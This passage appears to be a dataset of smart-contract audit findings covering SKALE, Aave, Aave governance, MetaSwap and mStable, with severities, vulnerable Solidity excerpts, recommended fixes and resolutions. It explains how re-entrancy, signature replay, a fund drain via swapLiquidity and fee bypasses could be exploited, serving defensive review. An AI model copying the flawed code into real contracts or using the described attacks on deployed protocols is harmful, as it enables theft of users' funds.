ConstantsHolder constants = ConstantsHolder(contractManager.getContract(\"ConstantsHolder\"));\\n rotations[schainIndex].nodeIndex = nodeIndex;\\n rotations[schainIndex].newNodeIndex = nodeIndex;\\n rotations[schainIndex].freezeUntil = now.add(constants.rotationDelay());\\n waitForNewNode[schainIndex] = true;\\n}\\n```\\n -Adding a new schain may potentially hit the gas limit PendingчmediumчWhen adding a new schain, a group of random 16 nodes is randomly selected to run that schain. 
In order to do so, the `_generateGroup` function iterates over all the nodes that can be used for that purpose:\\n```\\nfunction \\_generateGroup(bytes32 schainId, uint numberOfNodes) private returns (uint[] memory nodesInGroup) {\\n Nodes nodes = Nodes(contractManager.getContract(\"Nodes\"));\\n uint8 space = schains[schainId].partOfNode;\\n nodesInGroup = new uint[](numberOfNodes);\\n\\n uint[] memory possibleNodes = isEnoughNodes(schainId);\\n require(possibleNodes.length >= nodesInGroup.length, \"Not enough nodes to create Schain\");\\n uint ignoringTail = 0;\\n uint random = uint(keccak256(abi.encodePacked(uint(blockhash(block.number.sub(1))), schainId)));\\n for (uint i = 0; i < nodesInGroup.length; ++i) {\\n uint index = random % (possibleNodes.length.sub(ignoringTail));\\n uint node = possibleNodes[index];\\n nodesInGroup[i] = node;\\n \\_swap(possibleNodes, index, possibleNodes.length.sub(ignoringTail).sub(1));\\n ++ignoringTail;\\n\\n \\_exceptionsForGroups[schainId][node] = true;\\n addSchainForNode(node, schainId);\\n require(nodes.removeSpaceFromNode(node, space), \"Could not remove space from Node\");\\n }\\n```\\n\\nIf the total number of nodes exceeds around a few thousands, adding a schain may hit the block gas limit.чAvoid iterating over all nodes when selecting a random node for a schain.чч```\\nfunction \\_generateGroup(bytes32 schainId, uint numberOfNodes) private returns (uint[] memory nodesInGroup) {\\n Nodes nodes = Nodes(contractManager.getContract(\"Nodes\"));\\n uint8 space = schains[schainId].partOfNode;\\n nodesInGroup = new uint[](numberOfNodes);\\n\\n uint[] memory possibleNodes = isEnoughNodes(schainId);\\n require(possibleNodes.length >= nodesInGroup.length, \"Not enough nodes to create Schain\");\\n uint ignoringTail = 0;\\n uint random = uint(keccak256(abi.encodePacked(uint(blockhash(block.number.sub(1))), schainId)));\\n for (uint i = 0; i < nodesInGroup.length; ++i) {\\n uint index = random % 
(possibleNodes.length.sub(ignoringTail));\\n uint node = possibleNodes[index];\\n nodesInGroup[i] = node;\\n \\_swap(possibleNodes, index, possibleNodes.length.sub(ignoringTail).sub(1));\\n ++ignoringTail;\\n\\n \\_exceptionsForGroups[schainId][node] = true;\\n addSchainForNode(node, schainId);\\n require(nodes.removeSpaceFromNode(node, space), \"Could not remove space from Node\");\\n }\\n```\\n -Re-entrancy attacks with ERC-777чlowчSome tokens may allow users to perform re-entrancy while calling the `transferFrom` function. For example, it would be possible for an attacker to “borrow” a large amount of ERC-777 tokens from the lending pool by re-entering the `deposit` function from within `transferFrom`.\\n```\\nfunction deposit(\\n address asset,\\n uint256 amount,\\n address onBehalfOf,\\n uint16 referralCode\\n) external override {\\n \\_whenNotPaused();\\n ReserveLogic.ReserveData storage reserve = \\_reserves[asset];\\n\\n ValidationLogic.validateDeposit(reserve, amount);\\n\\n address aToken = reserve.aTokenAddress;\\n\\n reserve.updateState();\\n reserve.updateInterestRates(asset, aToken, amount, 0);\\n\\n bool isFirstDeposit = IAToken(aToken).balanceOf(onBehalfOf) == 0;\\n if (isFirstDeposit) {\\n \\_usersConfig[onBehalfOf].setUsingAsCollateral(reserve.id, true);\\n }\\n\\n IAToken(aToken).mint(onBehalfOf, amount, reserve.liquidityIndex);\\n\\n //transfer to the aToken contract\\n IERC20(asset).safeTransferFrom(msg.sender, aToken, amount);\\n\\n emit Deposit(asset, msg.sender, onBehalfOf, amount, referralCode);\\n}\\n```\\n\\nBecause the `safeTransferFrom` call is happening at the end of the `deposit` function, the `deposit` will be fully processed before the tokens are actually transferred.\\nSo at the beginning of the transfer, the attacker can re-enter the call to withdraw their deposit. The withdrawal will succeed even though the attacker's tokens have not yet been transferred to the lending pool. 
Essentially, the attacker is granted a flash-loan but without paying fees.\\nAdditionally, after these calls, interest rates will be skewed because interest rate update relies on the actual current balance.\\nRemediation\\nDo not whitelist ERC-777 or other re-entrable tokens to prevent this kind of attack.чResolution\\nThe issue was partially mitigated in `deposit` function by minting AToken before the transfer of the `deposit` token.чч```\\nfunction deposit(\\n address asset,\\n uint256 amount,\\n address onBehalfOf,\\n uint16 referralCode\\n) external override {\\n \\_whenNotPaused();\\n ReserveLogic.ReserveData storage reserve = \\_reserves[asset];\\n\\n ValidationLogic.validateDeposit(reserve, amount);\\n\\n address aToken = reserve.aTokenAddress;\\n\\n reserve.updateState();\\n reserve.updateInterestRates(asset, aToken, amount, 0);\\n\\n bool isFirstDeposit = IAToken(aToken).balanceOf(onBehalfOf) == 0;\\n if (isFirstDeposit) {\\n \\_usersConfig[onBehalfOf].setUsingAsCollateral(reserve.id, true);\\n }\\n\\n IAToken(aToken).mint(onBehalfOf, amount, reserve.liquidityIndex);\\n\\n //transfer to the aToken contract\\n IERC20(asset).safeTransferFrom(msg.sender, aToken, amount);\\n\\n emit Deposit(asset, msg.sender, onBehalfOf, amount, referralCode);\\n}\\n```\\n -Attacker can abuse swapLiquidity function to drain users' fundsчmediumчThe `swapLiquidity` function allows liquidity providers to atomically swap their collateral. 
The function takes a receiverAddressargument that normally points to an `ISwapAdapter` implementation trusted by the user.\\n```\\nvars.fromReserveAToken.burn(\\n msg.sender,\\n receiverAddress,\\n amountToSwap,\\n fromReserve.liquidityIndex\\n);\\n// Notifies the receiver to proceed, sending as param the underlying already transferred\\nISwapAdapter(receiverAddress).executeOperation(\\n fromAsset,\\n toAsset,\\n amountToSwap,\\n address(this),\\n params\\n);\\n\\nvars.amountToReceive = IERC20(toAsset).balanceOf(receiverAddress);\\nif (vars.amountToReceive != 0) {\\n IERC20(toAsset).transferFrom(\\n receiverAddress,\\n address(vars.toReserveAToken),\\n vars.amountToReceive\\n );\\n\\n if (vars.toReserveAToken.balanceOf(msg.sender) == 0) {\\n \\_usersConfig[msg.sender].setUsingAsCollateral(toReserve.id, true);\\n }\\n\\n vars.toReserveAToken.mint(msg.sender, vars.amountToReceive, toReserve.liquidityIndex);\\n```\\n\\nHowever, since an attacker can pass any address as the `receiverAddress`, they can arbitrarily transfer funds from other contracts that have given allowances to the `LendingPool` contract (for example, another ISwapAdapter).\\nThe `amountToSwap` is defined by the caller and can be very small. 
The attacker gets the difference between `IERC20(toAsset).balanceOf(receiverAddress)` value of `toAsset` and the `amountToSwap` of `fromToken`.\\nRemediation\\nEnsure that no funds can be stolen from contracts that have granted allowances to the `LendingPool` contract.чResolution\\nSolved by removing `swapLiquidity` functionality.чч```\\nvars.fromReserveAToken.burn(\\n msg.sender,\\n receiverAddress,\\n amountToSwap,\\n fromReserve.liquidityIndex\\n);\\n// Notifies the receiver to proceed, sending as param the underlying already transferred\\nISwapAdapter(receiverAddress).executeOperation(\\n fromAsset,\\n toAsset,\\n amountToSwap,\\n address(this),\\n params\\n);\\n\\nvars.amountToReceive = IERC20(toAsset).balanceOf(receiverAddress);\\nif (vars.amountToReceive != 0) {\\n IERC20(toAsset).transferFrom(\\n receiverAddress,\\n address(vars.toReserveAToken),\\n vars.amountToReceive\\n );\\n\\n if (vars.toReserveAToken.balanceOf(msg.sender) == 0) {\\n \\_usersConfig[msg.sender].setUsingAsCollateral(toReserve.id, true);\\n }\\n\\n vars.toReserveAToken.mint(msg.sender, vars.amountToReceive, toReserve.liquidityIndex);\\n```\\n -VotingMachine - tryToMoveToValidating can lock up proposalsчhighчAfter a vote was received, the proposal can move to a validating state if any of the votes pass the proposal's `precReq` value, referred to as the minimum threshold.\\n```\\ntryToMoveToValidating(\\_proposalId);\\n```\\n\\nInside the method `tryToMoveToValidating` each of the vote options are checked to see if they pass `precReq`. 
In case that happens, the proposal goes into the next stage, specifically `Validating`.\\n```\\n/// @notice Function to move to Validating the proposal in the case the last vote action\\n/// was done before the required votingBlocksDuration passed\\n/// @param \\_proposalId The id of the proposal\\nfunction tryToMoveToValidating(uint256 \\_proposalId) public {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.proposalStatus == ProposalStatus.Voting, \"VOTING\\_STATUS\\_REQUIRED\");\\n if (\\_proposal.currentStatusInitBlock.add(\\_proposal.votingBlocksDuration) <= block.number) {\\n for (uint256 i = 0; i <= COUNT\\_CHOICES; i++) {\\n if (\\_proposal.votes[i] > \\_proposal.precReq) {\\n internalMoveToValidating(\\_proposalId);\\n }\\n }\\n }\\n}\\n```\\n\\nThe method `internalMoveToValidating` checks the proposal's status to be `Voting` and proceeds to moving the proposal into `Validating` state.\\n```\\n/// @notice Internal function to change proposalStatus from Voting to Validating\\n/// @param \\_proposalId The id of the proposal\\nfunction internalMoveToValidating(uint256 \\_proposalId) internal {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.proposalStatus == ProposalStatus.Voting, \"ONLY\\_ON\\_VOTING\\_STATUS\");\\n \\_proposal.proposalStatus = ProposalStatus.Validating;\\n \\_proposal.currentStatusInitBlock = block.number;\\n emit StatusChangeToValidating(\\_proposalId);\\n}\\n```\\n\\nThe problem appears if multiple vote options go past the minimum threshold. 
This is because the loop does not stop after the first found option and the loop will fail when the method `internalMoveToValidating` is called a second time.\\n```\\nfor (uint256 i = 0; i <= COUNT\\_CHOICES; i++) {\\n if (\\_proposal.votes[i] > \\_proposal.precReq) {\\n internalMoveToValidating(\\_proposalId);\\n }\\n}\\n```\\n\\nThe method `internalMoveToValidating` fails the second time because the first time it is called, the proposal goes into the `Validating` state and the second time it is called, the require check fails.\\n```\\nrequire(\\_proposal.proposalStatus == ProposalStatus.Voting, \"ONLY\\_ON\\_VOTING\\_STATUS\");\\n\\_proposal.proposalStatus = ProposalStatus.Validating;\\n```\\n\\nThis can lead to proposal lock-ups if there are enough votes to at least one option that pass the minimum threshold.чAfter moving to the `Validating` state return successfully.\\n```\\nfunction tryToMoveToValidating(uint256 \\_proposalId) public {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.proposalStatus == ProposalStatus.Voting, \"VOTING\\_STATUS\\_REQUIRED\");\\n if (\\_proposal.currentStatusInitBlock.add(\\_proposal.votingBlocksDuration) <= block.number) {\\n for (uint256 i = 0; i <= COUNT\\_CHOICES; i++) {\\n if (\\_proposal.votes[i] > \\_proposal.precReq) {\\n internalMoveToValidating(\\_proposalId);\\n return; // <- this was added\\n }\\n }\\n }\\n}\\n```\\n\\nAn additional change can be done to `internalMoveToValidating` because it is called only in `tryToMoveToValidating` and the parent method already does the check.\\n```\\n/// @notice Internal function to change proposalStatus from Voting to Validating\\n/// @param \\_proposalId The id of the proposal\\nfunction internalMoveToValidating(uint256 \\_proposalId) internal {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n // The line below can be removed\\n // require(\\_proposal.proposalStatus == ProposalStatus.Voting, \"ONLY\\_ON\\_VOTING\\_STATUS\");\\n 
\_proposal.proposalStatus = ProposalStatus.Validating;\n \_proposal.currentStatusInitBlock = block.number;\n emit StatusChangeToValidating(\_proposalId);\n}\n```\nчч```\ntryToMoveToValidating(\_proposalId);\n```\n -VotingMachine - verifyNonce should only allow the next nonceчhighчWhen a relayer calls `submitVoteByRelayer` they also need to provide a nonce. This nonce is cryptographically checked against the provided signature. It is also checked again to be higher than the previous nonce saved for that voter.\n```\n/// @notice Verifies the nonce of a voter on a proposal\n/// @param \_proposalId The id of the proposal\n/// @param \_voter The address of the voter\n/// @param \_relayerNonce The nonce submitted by the relayer\nfunction verifyNonce(uint256 \_proposalId, address \_voter, uint256 \_relayerNonce) public view {\n Proposal storage \_proposal = proposals[\_proposalId];\n require(\_proposal.voters[\_voter].nonce < \_relayerNonce, \"INVALID\_NONCE\");\n}\n```\n\nWhen the vote is saved, the previous nonce is incremented.\n```\nvoter.nonce = voter.nonce.add(1);\n```\n\nThis leaves the opportunity to use the same signature to vote multiple times, as long as the provided nonce is higher than the incremented nonce.чThe check should be more restrictive and make sure the consecutive nonce was provided.\n```\nrequire(\_proposal.voters[\_voter].nonce + 1 == \_relayerNonce, \"INVALID\_NONCE\");\n```\nчч```\n/// @notice Verifies the nonce of a voter on a proposal\n/// @param \_proposalId The id of the proposal\n/// @param \_voter The address of the voter\n/// @param \_relayerNonce The nonce submitted by the relayer\nfunction verifyNonce(uint256 \_proposalId, address \_voter, uint256 \_relayerNonce) public view {\n Proposal storage \_proposal = proposals[\_proposalId];\n require(\_proposal.voters[\_voter].nonce < \_relayerNonce, \"INVALID\_NONCE\");\n}\n```\n -VoteMachine - Cancelling vote does not 
increase the nonceчlowчA vote can be cancelled by calling `cancelVoteByRelayer` with the proposal ID, nonce, voter's address, signature and a hash of the sent params.\\nThe parameters are hashed and checked against the signature correctly.\\nThe nonce is part of these parameters and it is checked to be valid.\\n```\\nrequire(\\_proposal.voters[\\_voter].nonce < \\_relayerNonce, \"INVALID\\_NONCE\");\\n```\\n\\nOnce the vote is cancelled, the data is cleared but the nonce is not increased.\\n```\\nif (\\_cachedVoter.balance > 0) {\\n \\_proposal.votes[\\_cachedVoter.vote] = \\_proposal.votes[\\_cachedVoter.vote].sub(\\_cachedVoter.balance.mul(\\_cachedVoter.weight));\\n \\_proposal.totalVotes = \\_proposal.totalVotes.sub(1);\\n voter.weight = 0;\\n voter.balance = 0;\\n voter.vote = 0;\\n voter.asset = address(0);\\n emit VoteCancelled(\\n \\_proposalId,\\n \\_voter,\\n \\_cachedVoter.vote,\\n \\_cachedVoter.asset,\\n \\_cachedVoter.weight,\\n \\_cachedVoter.balance,\\n uint256(\\_proposal.proposalStatus)\\n );\\n}\\n```\\n\\nThis means that in the future, the same signature can be used as long as the nonce is still higher than the current one.чConsidering the recommendation from issue https://github.com/ConsenSys/aave-governance-dao-audit-2020-01/issues/4 is implemented, the nonce should also increase when the vote is cancelled. 
Otherwise the same signature can be replayed again.чч```\\nrequire(\\_proposal.voters[\\_voter].nonce < \\_relayerNonce, \"INVALID\\_NONCE\");\\n```\\n -Possible lock ups with SafeMath multiplication AcknowledgedчlowчIn some cases using SafeMath can lead to a situation where a contract is locked up due to an unavoidable overflow.\\nIt is theoretically possible that both the `internalSubmitVote()` and `internalCancelVote()` functions could become unusable by voters with a high enough balance, if the asset weighting is set extremely high.\\nThis line in `internalSubmitVote()` could overflow if the voter's balance and the asset weight were sufficiently high:\\n```\\nuint256 \\_votingPower = \\_voterAssetBalance.mul(\\_assetWeight);\\n```\\n\\nA similar situation occurs in internalCancelVote():\\n```\\n\\_proposal.votes[\\_cachedVoter.vote] = \\_proposal.votes[\\_cachedVoter.vote].sub(\\_cachedVoter.balance.mul(\\_cachedVoter.weight));\\n\\_proposal.totalVotes = \\_proposal.totalVotes.sub(1);\\n```\\nчThis could be protected against by setting a maximum value for asset weights. 
In practice it is very unlikely to occur in this situation, but it could be introduced at some point in the future.чч```\\nuint256 \\_votingPower = \\_voterAssetBalance.mul(\\_assetWeight);\\n```\\n -Reentrancy vulnerability in MetaSwap.swap()чhighч`MetaSwap.swap()` should have a reentrancy guard.\\nThe adapters use this general process:\\nCollect the from token (or ether) from the user.\\nExecute the trade.\\nTransfer the contract's balance of tokens (from and to) and ether to the user.\\nIf an attacker is able to reenter `swap()` before step 3, they can execute their own trade using the same tokens and get all the tokens for themselves.\\nThis is partially mitigated by the check against `amountTo` in `CommonAdapter`, but note that the `amountTo` typically allows for slippage, so it may still leave room for an attacker to siphon off some amount while still returning the required minimum to the user.\\n```\\n// Transfer remaining balance of tokenTo to sender\\nif (address(tokenTo) != Constants.ETH) {\\n uint256 balance = tokenTo.balanceOf(address(this));\\n require(balance >= amountTo, \"INSUFFICIENT\\_AMOUNT\");\\n \\_transfer(tokenTo, balance, recipient);\\n} else {\\n```\\n\\nAs an example of how this could be exploited, 0x supports an “EIP1271Wallet” signature type, which invokes an external contract to check whether a trade is allowed. A malicious maker might front run the swap to reduce their inventory. This way, the taker is sending more of the taker asset than necessary to `MetaSwap`. The excess can be stolen by the maker during the EIP1271 call.чUse a simple reentrancy guard, such as OpenZeppelin's `ReentrancyGuard` to prevent reentrancy in `MetaSwap.swap()`. 
It might seem more obvious to put this check in `Spender.swap()`, but the `Spender` contract intentionally does not use any storage to avoid interference between different adapters.чч```\\n// Transfer remaining balance of tokenTo to sender\\nif (address(tokenTo) != Constants.ETH) {\\n uint256 balance = tokenTo.balanceOf(address(this));\\n require(balance >= amountTo, \"INSUFFICIENT\\_AMOUNT\");\\n \\_transfer(tokenTo, balance, recipient);\\n} else {\\n```\\n -Simplify fee calculation in WethAdapterчlowч`WethAdapter` does some arithmetic to keep track of how much ether is being provided as a fee versus as funds that should be transferred into WETH:\\n```\\n// Some aggregators require ETH fees\\nuint256 fee = msg.value;\\n\\nif (address(tokenFrom) == Constants.ETH) {\\n // If tokenFrom is ETH, msg.value = fee + amountFrom (total fee could be 0)\\n require(amountFrom <= fee, \"MSG\\_VAL\\_INSUFFICIENT\");\\n fee -= amountFrom;\\n // Can't deal with ETH, convert to WETH\\n IWETH weth = getWETH();\\n weth.deposit{value: amountFrom}();\\n \\_approveSpender(weth, spender, amountFrom);\\n} else {\\n // Otherwise capture tokens from sender\\n // tokenFrom.safeTransferFrom(recipient, address(this), amountFrom);\\n \\_approveSpender(tokenFrom, spender, amountFrom);\\n}\\n\\n// Perform the swap\\naggregator.functionCallWithValue(abi.encodePacked(method, data), fee);\\n```\\n\\nThis code can be simplified by using `address(this).balance` instead.чResolution\\nConsenSys/[email protected]93bf5c6.\\nConsider something like the following code instead:\\n```\\nif (address(tokenFrom) == Constants.ETH) {\\n getWETH().deposit{value: amountFrom}(); // will revert if the contract has an insufficient balance\\n \\_approveSpender(weth, spender, amountFrom);\\n} else {\\n tokenFrom.safeTransferFrom(recipient, address(this), amountFrom);\\n \\_approveSpender(tokenFrom, spender, amountFrom);\\n}\\n\\n// Send the remaining balance as the 
fee.\\naggregator.functionCallWithValue(abi.encodePacked(method, data), address(this).balance);\\n```\\n\\nAside from being a little simpler, this way of writing the code makes it obvious that the full balance is being properly consumed. Part is traded, and the rest is sent as a fee.чч```\\n// Some aggregators require ETH fees\\nuint256 fee = msg.value;\\n\\nif (address(tokenFrom) == Constants.ETH) {\\n // If tokenFrom is ETH, msg.value = fee + amountFrom (total fee could be 0)\\n require(amountFrom <= fee, \"MSG\\_VAL\\_INSUFFICIENT\");\\n fee -= amountFrom;\\n // Can't deal with ETH, convert to WETH\\n IWETH weth = getWETH();\\n weth.deposit{value: amountFrom}();\\n \\_approveSpender(weth, spender, amountFrom);\\n} else {\\n // Otherwise capture tokens from sender\\n // tokenFrom.safeTransferFrom(recipient, address(this), amountFrom);\\n \\_approveSpender(tokenFrom, spender, amountFrom);\\n}\\n\\n// Perform the swap\\naggregator.functionCallWithValue(abi.encodePacked(method, data), fee);\\n```\\n -Consider checking adapter existence in MetaSwapчlowч`MetaSwap` doesn't check that an adapter exists before calling into Spender:\\n```\\nfunction swap(\\n string calldata aggregatorId,\\n IERC20 tokenFrom,\\n uint256 amount,\\n bytes calldata data\\n) external payable whenNotPaused nonReentrant {\\n Adapter storage adapter = adapters[aggregatorId];\\n\\n if (address(tokenFrom) != Constants.ETH) {\\n tokenFrom.safeTransferFrom(msg.sender, address(spender), amount);\\n }\\n\\n spender.swap{value: msg.value}(\\n adapter.addr,\\n```\\n\\nThen `Spender` performs the check and reverts if it receives `address(0)`.\\n```\\nfunction swap(address adapter, bytes calldata data) external payable {\\n require(adapter != address(0), \"ADAPTER\\_NOT\\_SUPPORTED\");\\n```\\n\\nIt can be difficult to decide where to put a check like this, especially when the operation spans multiple contracts. 
Arguments can be made for either choice (or even duplicating the check), but as a general rule it's a good idea to avoid passing invalid parameters internally. Checking for adapter existence in `MetaSwap.swap()` is a natural place to do input validation, and it means `Spender` can have a simpler model where it trusts its inputs (which always come from MetaSwap).чDrop the check from `Spender.swap()` and perform the check instead in `MetaSwap.swap()`.чч```\\nfunction swap(\\n string calldata aggregatorId,\\n IERC20 tokenFrom,\\n uint256 amount,\\n bytes calldata data\\n) external payable whenNotPaused nonReentrant {\\n Adapter storage adapter = adapters[aggregatorId];\\n\\n if (address(tokenFrom) != Constants.ETH) {\\n tokenFrom.safeTransferFrom(msg.sender, address(spender), amount);\\n }\\n\\n spender.swap{value: msg.value}(\\n adapter.addr,\\n```\\n -Swap fees can be bypassed using redeemMassetчhighчPart of the value proposition for liquidity providers is earning fees incurred for swapping between assets. However, traders can perform fee-less swaps by providing liquidity in one bAsset, followed by calling `redeemMasset()` to convert the resulting mAssets back into a proportional amount of bAssets. Since removing liquidity via `redeemMasset()` does not incur a fee this is equivalent to doing a swap with zero fees.\\nAs a very simple example, assuming a pool with 2 bAssets (say, DAI and USDT), it would be possible to swap 10 DAI to USDT as follows:\\nAdd 20 DAI to the pool, receive 20 mUSD\\ncall redeemMasset() to redeem 10 DAI and 10 USDT\\nThe boolean argument `applyFee` is set to `false` in _redeemMasset:\\n```\\n\\_settleRedemption(\\_recipient, \\_mAssetQuantity, props.bAssets, bAssetQuantities, props.indexes, props.integrators, false);\\n```\\nчResolution\\nThis issue was reported independently via the bug bounty program and was fixed early during the audit. 
The fix has already been deployed on mainnet using the upgrade mechanism\nCharge a small redemption fee in `redeemMasset()`.чч```\n\_settleRedemption(\_recipient, \_mAssetQuantity, props.bAssets, bAssetQuantities, props.indexes, props.integrators, false);\n```\n -Users can collect interest from SavingsContract by only staking mTokens momentarilyчhighчThe SAVE contract allows users to deposit mAssets in return for lending yield and swap fees. When depositing mAsset, users receive “credit” tokens at the momentary credit/mAsset exchange rate which is updated at every deposit. However, the smart contract enforces a minimum timeframe of 30 minutes in which the interest rate will not be updated. A user who deposits shortly before the end of the timeframe will receive credits at the stale interest rate and can immediately trigger an update of the rate and withdraw at the updated (more favorable) rate after the 30 minutes window. As a result, it would be possible for users to benefit from interest payouts by only staking mAssets momentarily and using them for other purposes the rest of the time.\n```\n// 1. Only collect interest if it has been 30 mins\nuint256 timeSinceLastCollection = now.sub(previousCollection);\nif(timeSinceLastCollection > THIRTY\_MINUTES) {\n```\nчRemove the 30 minutes window such that every deposit also updates the exchange rate between credits and tokens. Note that this issue was reported independently during the bug bounty program and a fix is currently being worked on.чч```\n// 1. Only collect interest if it has been 30 mins\nuint256 timeSinceLastCollection = now.sub(previousCollection);\nif(timeSinceLastCollection > THIRTY\_MINUTES) {\n```\n -Internal accounting of vault balance may diverge from actual token balance in lending pool Won't FixчmediumчIt is possible that the vault balance for a given bAsset is greater than the corresponding balance in the lending pool. 
This violates one of the correctness properties stated in the audit brief. Our Harvey fuzzer was able to generate a transaction that mints a small amount (0xf500) of mAsset. Due to the way that the lending pool integration (Compound in this case) updates the vault balance it ends up greater than the available balance in the lending pool.\\nMore specifically, the integration contract assumes that the amount deposited into the pool is equal to the amount received by the mAsset contract for the case where no transaction fees are charged for token transfers:\\n```\\nquantityDeposited = \\_amount;\\n\\nif(\\_isTokenFeeCharged) {\\n // If we charge a fee, account for it\\n uint256 prevBal = \\_checkBalance(cToken);\\n require(cToken.mint(\\_amount) == 0, \"cToken mint failed\");\\n uint256 newBal = \\_checkBalance(cToken);\\n quantityDeposited = \\_min(quantityDeposited, newBal.sub(prevBal));\\n} else {\\n // Else just execute the mint\\n require(cToken.mint(\\_amount) == 0, \"cToken mint failed\");\\n}\\n\\nemit Deposit(\\_bAsset, address(cToken), quantityDeposited);\\n```\\n\\nFor illustration, consider the following scenario: assume your current balance in a lending pool is 0. When you deposit some amount X into the lending pool your balance after the deposit may be less than X (even if the underlying token does not charge transfer fees). One reason for this is rounding, but, in theory, a lending pool could also charge fees, etc.\\nThe vault balance is updated in function `Masset._mintTo` based on the amount returned by the integration.\\n```\\nbasketManager.increaseVaultBalance(bInfo.index, integrator, quantityDeposited);\\n```\\n\\n```\\nuint256 deposited = IPlatformIntegration(\\_integrator).deposit(\\_bAsset, quantityTransferred, \\_erc20TransferFeeCharged);\\n```\\n\\nThis violation of the correctness property is temporary since the vault balance is readjusted when interest is collected. However, the time frame of ca. 
30 minutes between interest collections (may be longer if no continuous interest is distributed) means that it may be violated for substantial periods of time.\\n```\\nuint256 balance = IPlatformIntegration(integrations[i]).checkBalance(b.addr);\\nuint256 oldVaultBalance = b.vaultBalance;\\n\\n// accumulate interest (ratioed bAsset)\\nif(balance > oldVaultBalance && b.status == BassetStatus.Normal) {\\n // Update balance\\n basket.bassets[i].vaultBalance = balance;\\n```\\n\\nThe regular updates due to interest collection should ensure that the difference stays relatively small. However, note that the following scenarios is feasible: assuming there is 0 DAI in the basket, a user mints X mUSD by depositing X DAI. While the interest collection hasn't been triggered yet, the user tries to redeem X mUSD for DAI. This may fail since the amount of DAI in the lending pool is smaller than X.чIt seems like this issue could be fixed by using the balance increase from the lending pool to update the vault balance (much like for the scenario where transfer fees are charged) instead of using the amount received.чч```\\nquantityDeposited = \\_amount;\\n\\nif(\\_isTokenFeeCharged) {\\n // If we charge a fee, account for it\\n uint256 prevBal = \\_checkBalance(cToken);\\n require(cToken.mint(\\_amount) == 0, \"cToken mint failed\");\\n uint256 newBal = \\_checkBalance(cToken);\\n quantityDeposited = \\_min(quantityDeposited, newBal.sub(prevBal));\\n} else {\\n // Else just execute the mint\\n require(cToken.mint(\\_amount) == 0, \"cToken mint failed\");\\n}\\n\\nemit Deposit(\\_bAsset, address(cToken), quantityDeposited);\\n```\\n -Missing validation in Masset._redeemTo AcknowledgedчmediumчIn function `_redeemTo` the collateralisation ratio is not taken into account unlike in _redeemMasset:\\n```\\nuint256 colRatio = StableMath.min(props.colRatio, StableMath.getFullScale());\\n\\n// Ensure payout is related to the collateralised mAsset quantity\\nuint256 
collateralisedMassetQuantity = \\_mAssetQuantity.mulTruncate(colRatio);\\n```\\n\\nIt seems like `_redeemTo` should not be executed if the collateralisation ratio is below 100%. However, the contracts (that is, `Masset` and ForgeValidator) themselves don't seem to enforce this explicitly. Instead, the governor needs to ensure that the collateralisation ratio is only set to a value below 100% when the basket is not “healthy” (for instance, if it is considered “failed”). Failing to ensure this may allow an attacker to redeem a disproportionate amount of assets. Note that the functionality for setting the collateralisation ratio is not currently implemented in the audited code.чConsider enforcing the intended use of `_redeemTo` more explicitly. For instance, it might be possible to introduce additional input validation by requiring that the collateralisation ratio is not below 100%.чч```\\nuint256 colRatio = StableMath.min(props.colRatio, StableMath.getFullScale());\\n\\n// Ensure payout is related to the collateralised mAsset quantity\\nuint256 collateralisedMassetQuantity = \\_mAssetQuantity.mulTruncate(colRatio);\\n```\\n -Removing a bAsset might leave some tokens stuck in the vault AcknowledgedчlowчIn function `_removeBasset` there is existing validation to make sure only “empty” vaults are removed:\\n```\\nrequire(bAsset.vaultBalance == 0, \"bAsset vault must be empty\");\\n```\\n\\nHowever, this is not necessarily sufficient since the lending pool balance may be higher than the vault balance. The reason is that the vault balance is usually slightly out-of-date due to the 30 minutes time span between interest collections. Consider the scenario: (1) a user swaps out an asset 29 minutes after the last interest collection to reduce its vault balance from 100 USD to 0, and (2) the governor subsequently remove the asset. 
During those 29 minutes the asset was collecting interest (according to the lending pool the balance was higher than 100 USD at the time of the swap) that is now “stuck” in the vault.чConsider adding additional input validation (for instance, by requiring the lending pool balance to be 0) or triggering a swap directly when removing an asset from the basket.чч```\nrequire(bAsset.vaultBalance == 0, \"bAsset vault must be empty\");\n```\n -Unused parameter in BasketManager._addBasset Won't FixчlowчIt seems like the `_measurementMultiple` parameter is always `StableMath.getRatioScale()` (1e8). There is also some range validation code that seems unnecessary if the parameter is always 1e8.\n```\nrequire(\_measurementMultiple >= 1e6 && \_measurementMultiple <= 1e10, \"MM out of range\");\n```\nчConsider removing the parameter and the input validation to improve the readability of the code.чч```\nrequire(\_measurementMultiple >= 1e6 && \_measurementMultiple <= 1e10, \"MM out of range\");\n```\n -Assumptions are made about interest distribution Won't FixчlowчThere is a mechanism that prevents interest collection if the extrapolated APY exceeds a threshold (MAX_APY).\n```\nrequire(extrapolatedAPY < MAX\_APY, \"Interest protected from inflating past maxAPY\");\n```\n\nThe extrapolation seems to assume that the interest is paid out frequently and continuously. It seems like a less frequent payout (for instance, once a month/year) could be rejected since the extrapolation considers the interest since the last time that `collectAndDistributeInterest` was called (potentially without interest being collected).чConsider revisiting or documenting this assumption. 
For instance, one could consider extrapolating between the current time and the last time that (non-zero) interest was actually collected.чч```\\nrequire(extrapolatedAPY < MAX\\_APY, \"Interest protected from inflating past maxAPY\");\\n```\\n -Assumptions are made about Aave and Compound integrations AcknowledgedчlowчThe code makes several assumptions about the Aave and Compound integrations. A malicious or malfunctioning integration (or lending pool) might violate those assumptions. This might lead to unintended behavior in the system. Below are three such assumptions:\\nfunction `checkBalance` reverts if the token hasn't been added:\\n```\\nIPlatformIntegration(\\_integration).checkBalance(\\_bAsset);\\n```\\n\\nfunction `withdraw` is trusted to not fail when it shouldn't:\\n```\\nIPlatformIntegration(\\_integrators[i]).withdraw(\\_recipient, bAsset, q, \\_bAssets[i].isTransferFeeCharged);\\n```\\n\\nthe mapping from mAssets to pTokens is fixed:\\n```\\nrequire(bAssetToPToken[\\_bAsset] == address(0), \"pToken already set\");\\n```\\n\\nThe first assumption could be avoided by adding a designated function to check if the token was added.\\nThe second assumption is more difficult to avoid, but should be considered when adding new integrations. The system needs to trust the lending pools to work properly; for instance, if the lending pool would blacklist the integration contract the system may behave in unintended ways.\\nThe third assumption could be avoided, but it comes at a cost.чConsider revisiting or avoiding these assumptions. For any assumptions that are there by design it would be good to document them to facilitate future changes. One should also be careful to avoid coupling between external systems. 
